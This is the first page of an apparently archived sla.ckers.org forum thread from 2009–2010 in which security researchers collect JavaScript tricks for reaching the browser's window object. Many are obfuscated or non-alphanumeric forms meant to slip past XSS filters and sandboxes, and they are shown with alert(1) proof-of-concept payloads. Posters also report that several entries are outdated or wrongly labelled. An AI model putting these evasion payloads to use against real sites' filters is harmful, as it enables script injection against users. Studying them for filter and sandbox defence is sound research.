Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
Tricks for getting a reference to window (rev 16)
Posted by: sirdarckcat
Date: June 08, 2009 12:46AM

/*
* I will be updating this thread when I have time with the replies.. any mods fell free to help.
*/

// all browsers
Quote

window;
Quote

frames;
Quote

self;
Quote

top;
Quote

parent;
Quote

this;
Quote

open().opener;
Quote

open("","_self")
Quote

Date.constructor('return this')()
Quote

document.documentElement.ownerDocument.defaultView
Quote

x=''.split,x(null)
Quote

__proto__.__parent__
Quote

(function(){}).__proto__.__parent__
Quote

(function(){ return arguments.callee.constructor.__parent__; })()
Quote

(function(){ return arguments.callee.caller.arguments.callee.caller.arguments[0].view })();
Quote

var win = null;var forEach = [].forEach;forEach(function(val, prop,thisp) {win = thisp;}, []);win

// ff only
Quote

[].constructor.constructor.__parent__; // Function.__parent__
Quote

content;
Quote

_content;
Quote

__parent__;
Quote

document.defaultView;
Quote

([]=[].sort)();
Quote

([],[].concat)()[+[]];
Quote

([]=[].reverse)();
Quote

([],[].slice)()[0];
Quote

([],[].filter)(function(x){x==window}); // this also works with sort
Quote

([],[].forEach)(function(x){x==window}); // change forEach with: every, map, some
Quote

constructor.prototype.__lookupGetter__("window")()
Quote

#0=[top][0]
Quote

#0={_:top}._

//firefox only [other windows]
Quote

window.constructor.prototype.__lookupGetter__("opener")();//get's a reference to opener even if setted to null

// FF, O9.5+, Chrome2, SF4 - not IE8 though
Quote

(0,[].valueOf)()
Quote

(0,Date.valueOf)()
Quote

(0,{}.valueOf)()
Quote

('',/\//.valueOf)()
Quote

('',RegExp.valueOf)()
Quote

('',crypto.valueOf)()
Quote

(0||Boolean.valueOf)()
Quote

(1&&isNaN.valueOf)()
Quote

(1?atob.valueOf:0)()

// Works on IE (is intended behaviour)
Quote

x={}.valueOf,x()
Quote

document.body.setExpression(1,'x=window')
Quote

document.parentWindow

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 16 time(s). Last edit at 07/09/2009 03:34AM by sirdarckcat.

Options: ReplyQuote
Re: Tricks for getting a reference to window
Posted by: Anonymous User
Date: June 08, 2009 04:17AM

FF, O9.5+, Chrome2, SF4 - not IE8 though
Quote

(0,[].valueOf)()
(0,Date.valueOf)()
(0,{}.valueOf)()
('',/\//.valueOf)()
('',RegExp.valueOf)()
('',crypto.valueOf)()
(0||Boolean.valueOf)()
(1&&isNaN.valueOf)()
(1?atob.valueOf:0)()

There's a plethora of possibilities to work with valueOf() - as the examples show almost each and any JS/DOM property can be used before .valueOf();



Edited 1 time(s). Last edit at 06/08/2009 05:05PM by .mario.

Options: ReplyQuote
Re: Tricks for getting a reference to window
Posted by: Gareth Heyes
Date: June 08, 2009 07:46AM

// Works on IE (is intended behaviour)
x={}.valueOf,x()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window
Posted by: Anonymous User
Date: June 08, 2009 11:07AM

Little bit lame and IE only:

Quote

document.body.setExpression(1,'x=window')



Edited 1 time(s). Last edit at 06/08/2009 05:04PM by .mario.

Options: ReplyQuote
Re: Tricks for getting a reference to window
Posted by: Anonymous User
Date: June 08, 2009 05:04PM

Quote

Date.constructor('return this')()

Options: ReplyQuote
Re: Tricks for getting a reference to window
Posted by: Gareth Heyes
Date: June 08, 2009 05:41PM

document.documentElement.ownerDocument.defaultView
x=''.split,x(null)
__proto__.__parent__
(function(){}).__proto__.__parent__
(function(){ return arguments.callee.constructor.__parent__; })()
(function(){ return arguments.callee.caller.arguments.callee.caller.arguments[0].view })();
var win = null;var forEach = [].forEach;forEach(function(val, prop,thisp) {win = thisp;}, []);win

At lot of these were from:-
http://stuff.mit.edu/iap/2008/facebook/

and either me or ma1

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window
Posted by: Gareth Heyes
Date: June 22, 2009 07:44AM

valueOf generally returns the window:-

(1,/a/.valueOf)().alert(1)
(1,/a/.valueOf)(null).alert(1)
(1,/a/.toString.valueOf)().alert(1)
(1,/a/.toString.valueOf)(null).alert(1)
(1,/a/.toString.valueOf)().constructor.constructor.constructor('alert(1)')()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 13)
Posted by: thornmaker
Date: June 24, 2009 07:25PM

is it possible to get a reference to window without using ascii chars AND without using parenthesis?

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 13)
Posted by: sirdarckcat
Date: June 24, 2009 09:56PM

ASCII? \0x00 - \0x7F ?
hahaha no way, you need at least {} or [] or something like that..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 13)
Posted by: thornmaker
Date: June 25, 2009 01:25AM

i meant to say, non-alphanumeric and without parenthesis

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 13)
Posted by: Anonymous User
Date: June 25, 2009 04:53AM

You mean like []['__parent__']? All characters can be retrieved - although the p is no fun (constructor, RegExp..) - my first approach for the shortest alnum was using this way but failed miserably in size :)

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 13)
Posted by: thornmaker
Date: June 25, 2009 11:46AM

@.mario yeah, that's what I'm looking for! thanks

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 13)
Posted by: Anonymous User
Date: June 26, 2009 02:35AM

Here's a no-alnum no-parenthesis reference to window - quite nasty but almost twitterable :)

[ö='__'][õ=/^/[Ô=[Ó=![Ò={}+ö]+Ò][Õ=!!Ò+ö]+Ò,Ò[Ø=-~[Ö=-~Ò],ø=Ø*Ø+Ö]+Ò[Ö]+Ô[Ö]+Ó[ò=Ö+Ø]+Õ[ó=-!Ö]+Õ[Ö]+Ô[ó]+Ò[ø]+Õ[ó]+Ò[Ö]+Õ[Ö]]+ö,ö+õ[ø*ò-Ö]+Ó[Ö]+Õ[Ö]+Õ[ò]+Ô[Ö]+Õ[ó]+ö]
166

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 13)
Posted by: holiman
Date: June 26, 2009 05:04AM

Wow, that's nasty. Did you choose variablenames as a means of obfuscation? :)

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: August 24, 2009 04:56AM

constructor == window :)

Actually not window but:-
constructor.constructor.constructor("alert(1)")()

Actually yeah window :)
constructor.prototype.__lookupGetter__("top")()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 08/24/2009 05:03AM by Gareth Heyes.

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: September 02, 2009 07:19AM

(1,/heh/(/heh/).sort)()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: December 29, 2009 02:54PM

2,000,001 way to get window:-

01.__parent__

Why is that anything? Because try:-
1.__parent__

It doesn't work :)

forcing octal numbers allows us to use numbers with () and get properties

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: sirdarckcat
Date: December 30, 2009 10:00PM

well for decimals you can do 1..__parent__ but I see your point heh :) cool!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: January 05, 2010 10:47AM

hehe IE only, no idea what RuntimeObject does though

RuntimeObject().alert(/I rock/)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: January 19, 2010 05:34AM

(1,Object(Array.prototype).sort)()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: SW
Date: February 09, 2010 05:23AM

A lot of that list above doesn't seem to work any more.

On a similar line as those sort() ones, since I am still failing to understand why it works...

FF only:
[].sort().call()
[]["sort"].apply()

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: May 27, 2010 08:43AM

https://groups.google.com/group/google-caja-discuss/browse_thread/thread/903bb21887ed092e (Via Caja)

<canvas id=c></canvas>
<script>
alert(document.getElementById('c').getContext('2d').canvas.offsetParent.__parent__.__parent__);
</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: July 13, 2010 07:22AM

Yeah WTF IE:-
document.Script

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: July 15, 2010 12:25PM

//sooooooooo sweeeeeeeeeeet
<></>.function::__parent__

//All these can be called ;)
__count__,__defineGetter__,__lookupGetter__,__lookupSetter__,__parent__,__proto__,anchor,appendChild,attribute,attributes,big,blink,bold,charAt,charCodeAt,children,concat,constructor,contains,elements,fixed,fontcolor,fontsize,hasOwnProperty,indexOf,isPrototypeOf,italics,lastIndexOf,length,link,localName,localeCompare,match,name,namespace,normalize,parent,propertyIsEnumerable,quote,repeat,replace,reverse,search,slice,small,split,strike,sub,substr,substring,sup,text,toJSON,toLocaleLowerCase,toLocaleString,toLocaleUpperCase,toLowerCase,toSource,toString,toUpperCase,trim,trimLeft,trimRight,unwatch,valueOf,watch

//oh yeah
''.function::__parent__;
[].function::__parent__;
1..function::__parent__;

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 07/15/2010 01:13PM by Gareth Heyes.

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: July 16, 2010 05:23AM

function:: is the new window!!!!!!!!!!!!!!!!!!!!


function::['alert'](1)

//by me and mario :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Anonymous User
Date: July 20, 2010 07:49AM

Amazing stuff that is...

<?ø?>.\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e::\u005f\u005f\u0070\u0061\u0072\u0065\u006e\u0074\u005f\u005f

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: July 20, 2010 08:00AM

It's almost as good as FF2

<?ø?>.\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e::['\137\137\160\141\162\145\156\164\137\137']

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: theharmonyguy
Date: July 23, 2010 08:15AM

I was playing around with some of the tricks on this list and came across two issues...

First, some of the ones under "all browsers" use __proto__ and __parent__. But wouldn't those exclude IE (and Opera)? Also, __proto__.__parent__ is undefined in Chrome.

Second, we should perhaps distinguish between getting a window object and getting the window object of the current document. For instance, x=''.split,x(null) returns a window object, but x(null).location is undefined and x(null).eval() doesn't seem to work.

I bring this up because I was trying to create some cross-browser non-alnum code and I couldn't seem to get a useful window object...



Edited 1 time(s). Last edit at 07/23/2010 08:26AM by theharmonyguy.

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: July 23, 2010 09:07AM

@theharmonyguy

Yeah there are some uncorrected mistakes but fixing them is boring maybe we'll get round to it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Posted by: LeverOne
Date: July 23, 2010 09:27AM

@theharmonyguy

x=''.split
alert(typeof x()[0])

----------------------
~Veritas~

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.